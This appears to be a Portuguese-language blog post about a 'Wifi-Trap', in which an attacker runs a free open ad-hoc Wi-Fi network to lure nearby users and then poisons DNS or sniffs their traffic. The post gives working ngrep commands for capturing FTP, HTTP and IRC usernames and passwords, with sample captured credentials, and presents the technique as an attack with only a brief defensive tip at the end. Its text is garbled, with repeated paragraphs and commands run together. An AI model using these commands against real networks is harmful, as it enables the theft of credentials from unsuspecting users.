Salve pessoal do BotecoUnix neste artigo vou mostrar uma técnica diferente de snifing ou seja farejar dados de um alvo,Bem a teoria desta técnica é bem simples imagine uma rede uma teia de aranha os insetos vão na teia por vontade enquanto a aranha faz o serviço dela… vou explicar
vamos para o ambiente, digamos que o cracker tenha uma maquina com uma placa de rede ligada na internet e outra placa wireless com chipset atheros por exemplo em modo “Ad-Hoc” cujo o “essid” esteja com nome “livre rede livre”
![](http://www.microsoft.com/library/media/1033/windowsxp/images/using/networking/setup/68588-diagram-ad-hoc.gif)
Desta forma todos que tiver no raio do sinal vão ficar lokos para entrar e ter internet gratis mas ai que entra o plano maléfico, limitamos o sinal dos clientes conectados e podemos fazer “N” coisas como “DNS poison” fazendo fakes do yahoo,google por exemplo ou podemos snifar e extrair dos packets o que nos intereça ou seja “Senhas” e dados do cliente para tal feito vamos usar o “NGREP” que nada mais é que um Snifer que podemos achar dados de acordo com uma determinada “Regex” exemplos
capturar dados do serviço FTP
Bem fico por aqui pessoal espero que esta dica ajude o pessoal
e usem uma criptografia boa antes de entrar em uma rede sem “WEP” ou “WPA”
verifique se é um roteador,acess point se não pode ser é nenhum cara fazendo Wifi-Trap
vamos para o ambiente, digamos que o cracker tenha uma maquina com uma placa de rede ligada na internet e outra placa wireless com chipset atheros por exemplo em modo “Ad-Hoc” cujo o “essid” esteja com nome “livre rede livre”
![](http://www.microsoft.com/library/media/1033/windowsxp/images/using/networking/setup/68588-diagram-ad-hoc.gif)
Desta forma todos que tiver no raio do sinal vão ficar lokos para entrar e ter internet gratis mas ai que entra o plano maléfico, limitamos o sinal dos clientes conectados e podemos fazer “N” coisas como “DNS poison” fazendo fakes do yahoo,google por exemplo ou podemos snifar e extrair dos packets o que nos intereça ou seja “Senhas” e dados do cliente para tal feito vamos usar o “NGREP” que nada mais é que um Snifer que podemos achar dados de acordo com uma determinada “Regex” exemplos
capturar dados do serviço FTP
Código:
;ngrep -wi -d any ‘user|pass’ port 21 capturar senhas da porta 80 ngrep -wi -d wlan0 'pass' port 80 -W suponhamos que você queira pegar senhas de IRC ngrep-1.45 # ./ngrep -wi -d wlan0 'user|pass' port 6667 interface: wlan0 (192.168.1.0/255.255.255.0) filter: (ip) and ( port 6667 ) match: ((^user|pass\W)|(\Wuser|pass$)|(\Wuser|pass\W)) ######## T 192.168.1.104:60420 -> 84.45.99.122:6667 [AP] PASS mypassword. #### T 192.168.1.104:60420 -> 84.45.99.122:6667 [AP] USER d3hydr8 8 * :d3hydr8. Ou senhas de http linuxbox:/home/d3hydr8/ngrep-1.45 # ./ngrep -q -d wlan0 -W byline port 80 -n 5 interface: wlan0 (192.168.1.0/255.255.255.0) filter: (ip) and ( port 80 ) T 192.168.1.104:42263 -> 205.158.62.76:80 [AP] GET /scripts/common/proxy.main?show_frame=Enter&action=login&domain=linuxmail.org&v= 9e4b59553085147ce2d5e268d0a8419d05dc4cb5c0f49a1fbc09f367d6d29229&login=d3hydr8& password=34819d7beeabb9260a5c854bc85b3e44&hash=1&md5=1 HTTP/1.1. Host: www.linuxmail.org. User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.10) Gecko/20071015 SUSE/2.0.0.10-0.1 Firefox/2.0.0.10. Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5. Accept-Language: en-us,en;q=0.5. Accept-Encoding: gzip,deflate. Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7. Keep-Alive: 300. Connection: keep-alive. Referer: http://www.linuxmail.org/scripts/common/index.main?signin=1&lang=us. Cookie: loginName=d3hydr8.
e usem uma criptografia boa antes de entrar em uma rede sem “WEP” ou “WPA”
verifique se é um roteador,acess point se não pode ser é nenhum cara fazendo Wifi-Trap